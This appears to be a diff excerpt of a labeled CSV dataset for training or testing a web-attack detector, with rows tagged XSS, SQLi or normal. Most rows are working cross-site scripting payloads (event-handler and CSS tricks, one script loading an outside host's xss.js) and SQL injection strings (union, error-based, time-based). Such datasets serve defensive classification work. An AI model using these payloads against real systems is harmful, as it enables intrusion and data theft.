<BODY ONLOAD=alert('XSS')>,1,XSS,9410
|
911 |
+
select ( case when ( 8362 = 7572 ) then 8362 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13597
|
912 |
+
Select a podcast episode to listen to.,3,normal,24146
|
913 |
+
"<summary onkeypress=""alert(1)"" contenteditable>test</summary>",1,XSS,3378
|
914 |
+
"<style>@keyframes slidein {}</style><multicol style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></multicol>",1,XSS,313
|
915 |
+
"<style>@keyframes x{}</style><form style=""animation-name:x"" onanimationend=""alert(1)""></form>",1,XSS,1651
|
916 |
+
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="""" alt='",1,XSS,2460
|
917 |
+
1' where 7036 = 7036,2,SQLi,21749
|
918 |
+
"{""id"":null,""firstName"":""Sam"",""lastName"":""Tan"",""address"":"" 7 Pasir Panjang #01-239"",""city"":""681"",""telephone"":""4006857720""}",3,normal,27216
|
919 |
+
<select autofocus onfocus=alert(1)>,1,XSS,9005
|
920 |
+
"1"" ) ) as ltco where 3862 = 3862 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12348
|
921 |
+
"<basefont ondblclick=""alert(1)"">test</basefont>",1,XSS,6236
|
922 |
+
"1'|| ( select 'odud' from dual where 2468 = 2468 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,11771
|
923 |
+
"<listing draggable=""true"" ondragend=""alert(1)"">test</listing>",1,XSS,3346
|
924 |
+
"select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and 'fbnx' = 'fbnx",2,SQLi,13340
|
925 |
+
"<shadow onbeforecopy=""alert(1)"" contenteditable>test</shadow>",1,XSS,3398
|
926 |
+
"1"" ) ) ) union all select null,null,null--",2,SQLi,19303
|
927 |
+
<object data=/ onreadystatechange=alert(1)>,1,XSS,7289
|
928 |
+
"<a xmlns:xlink=""http://www.w3.org/1999/xlink"" xlink:href=""?"">",1,XSS,3418
|
929 |
+
<body onpointermove=alert(1)>XSS</body>,1,XSS,8130
|
930 |
+
"1' ) ) as fusi where 2788 = 2788 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,14935
|
931 |
+
-7054 ) as gzvf where 9146 = 9146 or 3038 = 3038,2,SQLi,18683
|
932 |
+
The feature will launch in select countries later this year.,3,normal,25454
|
933 |
+
<mark id=x tabindex=1 onfocus=alert(1)></mark>,1,XSS,6300
|
934 |
+
Delete emails.,3,normal,23066
|
935 |
+
Randomly select a word.,3,normal,24448
|
936 |
+
"1"" ) ) ) union all select null,null,null,null,null,null,null,null#",2,SQLi,16585
|
937 |
+
"1'|| ( select 'xjtq' from dual where 5719 = 5719 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) ) ||'",2,SQLi,11823
|
938 |
+
"<svg onbeforecopy=""alert(1)"" contenteditable>test</svg>",1,XSS,4449
|
939 |
+
"<footer onpaste=""alert(1)"" contenteditable>test</footer>",1,XSS,4341
|
940 |
+
"select * from users where id = 1 union select @ 1$,version ( ) -- 1",2,SQLi,16467
|
941 |
+
"1"" ) ) as fmul where 7827 = 7827",2,SQLi,20369
|
942 |
+
"<nobr onbeforepaste=""alert(1)"" contenteditable>test</nobr>",1,XSS,3846
|
943 |
+
"1"" ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ""ponv"" = ""ponv",2,SQLi,10735
|
944 |
+
"admin"" or ""1""=""1""/*",2,SQLi,21908
|
945 |
+
"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#",2,SQLi,17228
|
946 |
+
"{""id"":null,""firstName"":""Mark"",""lastName"":""Taylor"",""address"":""52777 Leaders Heights Rd"",""city"":""661"",""telephone"":""142940621""}",3,normal,27503
|
947 |
+
"<bgsound onkeyup=""alert(1)"" contenteditable>test</bgsound>",1,XSS,3940
|
948 |
+
"ABC<div style=""x:\xE2\x80\x87expression(javascript:alert(1)"">DEF",1,XSS,2858
|
949 |
+
"<;DIV STYLE="";width: expression(alert(';XSS';));"";>;",1,XSS,5096
|
950 |
+
"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",2,SQLi,12062
|
951 |
+
1' waitfor delay '0:0:5'--,2,SQLi,20960
|
952 |
+
"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL--",2,SQLi,14012
|
953 |
+
"<nobr oncontextmenu=""alert(1)"">test</nobr>",1,XSS,7351
|
954 |
+
1' rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and 'nbxw' = 'nbxw,2,SQLi,14736
|
955 |
+
"1' ) ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( 'gyre' = 'gyre",2,SQLi,11147
|
956 |
+
"1 ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,16624
|
957 |
+
<th onpointerenter=alert(1)>XSS</th>,1,XSS,8886
|
958 |
+
Insert the memory card.,3,normal,22634
|
959 |
+
"-5207"" where 2050 = 2050 union all select 2050,2050,2050,2050,2050,2050,2050--",2,SQLi,15316
|
960 |
+
"1 ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( 6690 = 6690",2,SQLi,12678
|
961 |
+
"1"" and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ""egzm"" = ""egzm",2,SQLi,12674
|
962 |
+
<xmp onblur=alert(1) tabindex=1 id=x></xmp><input autofocus>,1,XSS,3531
|
963 |
+
<script>top['alert'](3)</script>,1,XSS,9485
|
964 |
+
"1', ( select ( case when ( 2073 = 5314 ) then 1 else 1/ ( select 0 ) end ) )",2,SQLi,15530
|
965 |
+
"<aside onmouseleave=""alert(1)"">test</aside>",1,XSS,7116
|
966 |
+
"_http://[email protected] style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);//",1,XSS,5
|
967 |
+
"<tt oncut=""alert(1)"" contenteditable>test</tt>",1,XSS,6437
|
968 |
+
"Open Photoshop CC 2020 and select ""Open"" and then select the file you want to flip.",3,normal,25820
|
969 |
+
"1 ) as kjsd where 1670 = 1670 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12515
|
970 |
+
"<SCRIPT ="">"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>",1,XSS,4422
|
971 |
+
1'|| ( select 'nwve' where 7721 = 7721,2,SQLi,19738
|
972 |
+
"<colgroup draggable=""true"" ondrag=""alert(1)"">test</colgroup>",1,XSS,3533
|
973 |
+
"-5507' or elt ( 1032 = 1032,3623 ) and 'ndqw' = 'ndqw",2,SQLi,18118
|
974 |
+
-6412%' or 4065 = 5815 and '%' = ',2,SQLi,20162
|
975 |
+
Select your brand.,3,normal,24898
|
976 |
+
"-2216 ) ) as hxmq where 5677 = 5677 union all select 5677,5677--",2,SQLi,16780
|
977 |
+
"AND ELT(1337=1337,SLEEP(5)) AND '1337' LIKE '1337",2,SQLi,18539
|
978 |
+
"1%' and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and '%' = '",2,SQLi,14675
|
979 |
+
"<;A HREF="";//www.google.com/"";>;XSS<;/A>;",1,XSS,7612
|
980 |
+
"1"" ) ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( ""hkjm"" like ""hkjm",2,SQLi,10925
|
981 |
+
"1"" ) ) as xxdm where 4818 = 4818",2,SQLi,20261
|
982 |
+
"ABC<div style=""x:\x20expression(javascript:alert(1)"">DEF",1,XSS,4207
|
983 |
+
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--,2,SQLi,19439
|
984 |
+
"<figure draggable=""true"" ondragleave=""alert(1)"">test</figure>",1,XSS,3404
|
985 |
+
Select a fragrance for your space.,3,normal,24099
|
986 |
+
"1"" ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ""cyyh"" = ""cyyh",2,SQLi,10674
|
987 |
+
"<style>:target {color:red;}</style><head id=x style=""transition:color 1s"" ontransitionend=alert(1)></head>",1,XSS,1221
|
988 |
+
"-9820"" or 1038 = 7502#",2,SQLi,21470
|
989 |
+
"<XSS STYLE=""behavior: url(xss.htc);"">",1,XSS,8549
|
990 |
+
"<button draggable=""true"" ondragenter=""alert(1)"">test</button>",1,XSS,3330
|
991 |
+
"<nav draggable=""true"" ondragleave=""alert(1)"">test</nav>",1,XSS,4587
|
992 |
+
1' in boolean mode ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) #,2,SQLi,15641
|
993 |
+
"<dfn draggable=""true"" ondragend=""alert(1)"">test</dfn>",1,XSS,4911
|
994 |
+
Where's the mall?,3,normal,23509
|
995 |
+
"First up, is the ban on immigration from select countries.",3,normal,26196
|
996 |
+
"{""id"":null,""name"":""notice""}",3,normal,27581
|
997 |
+
"<dl onkeydown=""alert(1)"" contenteditable>test</dl>",1,XSS,5527
|
998 |
+
"select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( ""soyg"" = ""soyg",2,SQLi,13554
|
999 |
+
"<bgsound ondblclick=""alert(1)"">test</bgsound>",1,XSS,6610
|
1000 |
+
Select product.,3,normal,24557
|